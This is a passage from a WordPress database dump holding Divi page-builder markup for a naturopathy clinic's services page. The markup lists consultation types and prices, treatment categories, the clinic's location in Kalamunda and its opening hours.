recommended.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\" min_height=\"425px\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Stress strategies</span><br /><span style=\"font-family: Montserrat;\">Exercise and movement</span><br /><span style=\"font-family: Montserrat;\">Mindfulness </span><br /><span style=\"font-family: Montserrat;\">Sleep hygiene</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"4_4\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Kalamunda & online</span>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-04-09 21:02:00','2025-04-09 13:02:00','',424,'https://verdenaturopathy.com.au/?p=458',0,'revision','',0),(455,1,'2025-04-09 20:44:21','2025-04-09 12:44:21','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" hover_enabled=\"0\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" 